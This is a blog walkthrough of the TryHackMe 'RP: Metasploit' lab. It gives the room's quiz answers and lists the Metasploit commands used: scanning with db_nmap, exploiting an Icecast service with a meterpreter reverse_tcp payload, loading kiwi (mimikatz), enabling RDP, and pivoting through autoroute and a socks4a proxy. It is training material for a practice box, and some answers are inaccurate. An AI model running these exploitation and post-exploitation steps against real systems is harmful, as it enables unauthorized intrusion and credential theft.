-->

  • TryHackeMe RP : Metasploit walkthrough



    TryHackeMe RP  Metasploit walkthrough




    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    tryhackme rp Metasploit


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here


    TryHackMe has recently had their 500th user sign up to access varied content from fundamentals of web security to basic reverse engineering. Their self contained virtual classrooms make it easy for users to focus on a particular area by aggregating the necessary information. They want users to focus on the learning instead of spending time scouring the internet for resources! They are a relatively new company, so they are still in the process of creating custom VMs for learning purposes, but more content is being released weekly and their newsletter gives users an insight to whats being released on a weekly basis ahead of time. TryHackeMe RP : Metasploit walkthrough





     tryhackme rp nmap





    Question:


    [Task 1] Intro

    [Task 2] Initializing…


    1) First things first, we need to initialize the database! Let’s do that now with the command: msfdb init





       msfdb init    


    I already initialzed database


    TryHackeMe RP : Metasploit walkthrough



    2) Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h


      msfconsole -h  


    TryHackeMe RP : Metasploit walkthrough




    3) We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the ‘-’


        ANS: -q    



    4) Once the database is initialized, go ahead and start Metasploit via the command: msfconsole


      msfconsole 




    TryHackeMe RP : Metasploit walkthrough




    5)  After Metasploit has started, let’s go ahead and check that we’ve connected to the database. Do this now with the command: db_status


      db_status 



    TryHackeMe RP : Metasploit walkthrough





    6) Cool! We’ve connected to the database, which type of database does Metasploit 5 use?


      ANS: postgresql 



     ---------------------



     [Task 3] Rock ’em to the Core [Commands]



    Let’s go ahead and start exploring the help menu. On the Metasploit prompt (where we’ll be at after we start Metasploit using msfconsole), type the command: help


      help  



    2) The help menu has a very short one-character alias, what is it?



       ?   



    3)  Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?



       search  



    4) Once we’ve found the module we want to leverage, what command we use to select it as the active module?



       use  



    5) How about if we want to view information about either a specific module or just the active one we have selected?



       info  




    6) Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can ‘talk’ to it. What command is this?


      connect 



    7) Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?



      banner  



    TryHackeMe RP : Metasploit walkthrough



    8)  We’ll revisit these next two commands shortly, however, they’re two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?


      set  



    9) Metasploit supports the use of global variables, something which is incredibly useful when you’re specifically focusing on a single box. What command changes the value of a variable globally?


      setg   



    10)  Now that we’ve learned about to change the value of variables, how do we view them? There are technically several answers to this question, however, I’m looking for a specific three-letter command which is used to view the value of single variables.


      get  



    TryHackeMe RP : Metasploit walkthrough





    11) How about changing the value of a variable to null/no value?



      unset 



    12) When performing a penetration test it’s quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?



       spool 



    13) Leaving a Metasploit console running isn’t always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.


       
      save  


      ----------------

     

    [Task 4] Modules for Every Occasion!



    1) Easily the most common module utilized, which module holds all of the exploit code we will use?


      exploit 



    2) Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?


       payload  



    3)  Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.


       auxiliary  




    4)  One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?


       post   



    5)  Commonly utilized in payload obfuscation, which module allows us to modify the ‘appearance’ of our exploit such that we may avoid signature detection?


       encoder 



    6) Last but not least, which module is used with buffer overflow and ROP attacks?


      NOP  



    7)  Not every module is loaded in by default, what command can we use to load different modules?


       load  



    -------------

    [Task 5] Move that shell!



    1) Metasploit comes with a built-in way to run nmap and feed it’s results directly into our database. Let’s run that now by using the command ‘db_nmap -sV BOX-IP’


       db_nmap -sV <ip>  





    TryHackeMe RP : Metasploit walkthrough






    2. What service does nmap identify running on port 135?


      ANS: msrdp 




    3. Let’s go ahead and see what information we have collected in the database. Try typing the command ‘hosts’ into the msfconsole now.


      hosts  



    TryHackeMe RP : Metasploit walkthrough



    4)  How about something else from the database, try the command ‘services’ now.




      services 



    TryHackeMe RP : Metasploit walkthrough





    5) One last thing, try the command ‘vulns’ now. This won’t show much at the current moment, however, it’s worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.


      vulns 



    6)  Now that we’ve scanned our victim system, let’s try connecting to it with a Metasploit payload. First, we’ll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type ‘use’ followed by a unique string found within only the target exploit. For example, try this out now with the following command ‘use icecast’. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start



      use icecast  




    TryHackeMe RP : Metasploit walkthrough



       ANS: exploit/windows/http/icecast_header 
     



    7) While that use command with the unique string can be incredibly useful that’s not quite the exploit we want here. Let’s now run the command ‘search multi/handler’. What is the name of the column on the far left side of the console that shows up next to ‘Name’? Go ahead and run the command ‘use NUMBER_NEXT_TO exploit/multi/handler` wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.




      search multi/handler  



    TryHackeMe RP : Metasploit walkthrough



      ANS: # 



    8)  Now type the command ‘use NUMBER_FROM_PREVIOUS_QUESTION’. This is the short way to use modules returned by search results.



      use 4  



    9) Next, let’s set the payload using this command ‘set PAYLOAD windows/meterpreter/reverse_tcp’. In this way, we can modify which payloads we want to use with our exploits. Additionally, let’s run this command ‘set LHOST YOUR_IP_ON_TRYHACKME’. You might have to check your IP using the command ‘ip addr’, it will likely be your tun0 interface.


      set PAYLOAD windows/meterpreter/reverse_tcpset 


       LHOST tun0    



    10) Let’s go ahead and return to our previous exploit, run the command `use icecast` to select it again.


      use icecast  



    11)  One last step before we can run our exploit. Run the command ‘set RHOST BOX_IP’ to tell Metasploit which target to attack.



      set RHOST <box_ip> 



    12) Once you’re set those variables correctly, run the exploit now via either the command ‘exploit’ or the command ‘run -j’ to run this as a job.


       run -j  




    13)  Once we’ve started this, we can check all of the jobs running on the system by running the command `jobs`

      jobs  


    14) After we’ve established our connection in the next task, we can list all of our sessions using the command `sessions`. Similarly, we can interact with a target session using the command `sessions -i SESSION_NUMBER`


       sessions   

       session 1  



    -------------


    [Task 6] We’re in, now what?



    1) First things first, our initial shell/process typically isn’t very stable. Let’s go ahead and attempt to move to a different process. First, let’s list the processes using the command ‘ps’. What’s the name of the spool service?

       ps  






    TryHackeMe RP : Metasploit walkthrough





        ANS: spoolsv.exe   




    2) Let’s go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won’t work at the current time as we don’t have sufficient privileges but we can still try!



       migrate -N spoolsv.exe  




    3) Well that migration didn’t work, let’s find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?


      getuid  



    4)  How about finding more information out about the system itself?



      sysinfo 




    5. This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?



         load kiwi     



    6)  Let’s go ahead and figure out the privileges of our current user, what command do we run?



       getprivs  



    7)  What command do we run to transfer files to our victim computer?


       upload  



    8)  How about if we want to run a Metasploit module?


       run   



    9) A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?


       ipconfig  




    10) Let’s go ahead and run a few post modules from Metasploit. First, let’s run the command `run post/windows/gather/checkvm`. This will determine if we’re in a VM, a very useful piece of knowledge for further pivoting.




       run post/windows/gather/checkvm 




    11) Next, let’s try: `run post/multi/recon/local_exploit_suggester`. This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we’ll be going through this in greater detail in the room `Ice`.



       run post/multi/recon/local_exploit_suggester  



    12) Finally, let’s try forcing RDP to be available. This won’t work since we aren’t administrators, however, this is a fun command to know about: `run post/windows/manage/enable_rdp`



      run post/windows/manage/enable_rdp  


    13. One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?


        shell  




    ---------------


    [Task 7] Makin’ Cisco Proud




    1) Let’s go ahead and run the command `run autoroute -h`, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.



      run autoroute -h  



       run autoroute -s 172.18.1.0 -n 255.255.255.0  




    2) Additionally, we can start a socks4a proxy server out of this session. Background our current meterpreter session and run the command `search server/socks4a`. What is the full path to the socks4a auxiliary module?



       search server/socks4a  



      ANS: auxiliary/server/socks4a  
     


    3)  Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks4a server with proxychains?



      proxychains  


    TryHackeMe RP : Metasploit walkthrough





     ----------------





    Disclaimer

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :-  



         




    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.